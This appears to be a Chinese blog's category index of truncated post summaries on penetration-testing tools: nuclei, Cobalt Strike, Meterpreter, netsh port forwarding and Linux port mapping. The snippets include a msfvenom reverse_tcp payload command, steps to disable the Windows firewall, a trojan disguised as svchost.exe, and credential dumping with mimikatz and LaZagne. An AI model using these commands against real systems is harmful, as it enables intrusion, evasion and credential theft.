随笔分类 -  工具使用

摘要:下载 https://github.com/projectdiscovery/nuclei 下载模板 https://github.com/projectdiscovery/nuclei-templates/releases 开始扫描,将结果保存result文件中 nuclei -l urls.tx 阅读全文
posted @ 2022-02-25 12:02 包子TT 阅读(653) 评论(0) 推荐(0)
摘要:Eclipse Memory Analyzer下载地址:http://www.eclipse.org/mat/downloads.phpffuf fuzz工具 https://github.com/ffuf/ffufspiderfoot信息收集:https://github.com/smicalle 阅读全文
posted @ 2022-01-14 16:45 包子TT 阅读(185) 评论(0) 推荐(0)
摘要:前提:已经控制内网的一台主机 一.正向连接 1.设置beacon 监听 2.把后门上传到目标内网主机执行,就会监听4444端口 3.在控制的那台内网主机上执行 connect 10.10.1.6:4444 就可以了 二、反向连接 1.设置监听 2.生成后门反弹到控制的主机就可以了 参考:https: 阅读全文
posted @ 2021-02-04 17:27 包子TT 阅读(747) 评论(0) 推荐(0)
摘要:netsh 是 windows 系统自带的一个命令行工具,这个工具可以内置中端口转发功能。 将来自333端口的流量全部转发到192.168.191.130的3389端口 netsh interface portproxy add v4tov4 listenport=333 connectaddres 阅读全文
posted @ 2021-02-04 17:06 包子TT 阅读(619) 评论(0) 推荐(0)
摘要:一、基础介绍 1.beacon命令 BeaconCommands Command Description browserpivot 注入受害者浏览器进程 bypassuac 绕过UAC cancel 取消正在进行的下载 cd 切换目录 checkin 强制让被控端回连一次 clear 清除beaco 阅读全文
posted @ 2021-02-04 16:19 包子TT 阅读(1196) 评论(0) 推荐(0)
摘要:一、系统命令 1.基本命令 sessions -i #进入会话 -k#杀死会话 background #将当前会话放置后台 run #执行已有模块 getuid #查看权限 getpid #查看当前进程的pid sysinfo #查看系统信息 ps #查看当前活跃进程n shell #进入目标cmd 阅读全文
posted @ 2021-02-04 13:34 包子TT 阅读(529) 评论(0) 推荐(0)
摘要:上传了webshell之后 1.上传免杀后门,起一个名字为svchost.exe 的木马 2.netsh advfirewall set allprofiles state off 关闭防火墙 3.提权 msf getsystem 4.minikazt 抓取密码 5.收集密码⼯具-LaZagne.e 阅读全文
posted @ 2021-02-01 10:31 包子TT 阅读(659) 评论(0) 推荐(0)
摘要:poc和各种工具集合,可以在里面搜索payload,工具,免杀,代理 https://github.com/Mr-xn/Penetration_Testing_POC 各种shell 生成 https://web.archive.org/web/20200806075428/https://krob 阅读全文
posted @ 2021-01-25 10:24 包子TT 阅读(286) 评论(0) 推荐(0)
摘要:安装 参考官网文档:https://docs.docker.com/ 中午社区:https://www.docker.org.cn/卸载之前的docker1.$ sudo apt-get remove docker docker-engine docker.io containerd runc$ s 阅读全文
posted @ 2020-12-17 19:22 包子TT 阅读(274) 评论(0) 推荐(0)
摘要:portmap liunx上:执行:./portmap -m 2 -p1 7003 -h2 127.0.0.1 -p2 7004意思就是监听来自7003端口的请求,将其转发到7004端口。 还有一个问题就是执行portmap命令时会提醒没有权限,这是就要给portmap加上权限chmod 777 p 阅读全文
posted @ 2020-12-09 14:56 包子TT 阅读(2739) 评论(0) 推荐(0)
摘要:下载脚本:https://github.com/rsmudge/ElevateKit 查看提权脚本: 现在提权的方法少得可怜,只有两种: 我们下面开始加载脚本 打开cs脚本管理: 加载脚本 加载后这么多了: 内网探针: net computers //内网探针 net view //探针内网网络架构 阅读全文
posted @ 2020-12-07 20:04 包子TT 阅读(1807) 评论(0) 推荐(1)
摘要:Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p w 阅读全文
posted @ 2020-11-11 16:19 包子TT 阅读(6507) 评论(0) 推荐(0)
摘要:CobaltStrike-机器上线微信提醒 这两天看cs看的头大 原文地址:http://www.nmd5.com/?p=567 Server酱申请账号 我们先申请一个Server酱的账号,使用Github账号即可登录,地址: http://sc.ftqq.com/ 申请SCKEY 登录之后,如下: 阅读全文
posted @ 2020-09-18 20:00 包子TT 阅读(1912) 评论(0) 推荐(1)
摘要:Cobalt Strike安装 系统要求 Cobalt Strike要求Java 1.8,Oracle Java 11,或OpenJDK 11。 如果你的系统上装有防病毒产品,请确保在安装 Cobalt Strike 前将其禁用 #团队服务器 Cobalt Strike 分为客户端组件和服务器组件。 阅读全文
posted @ 2020-09-18 17:45 包子TT 阅读(1337) 评论(0) 推荐(0)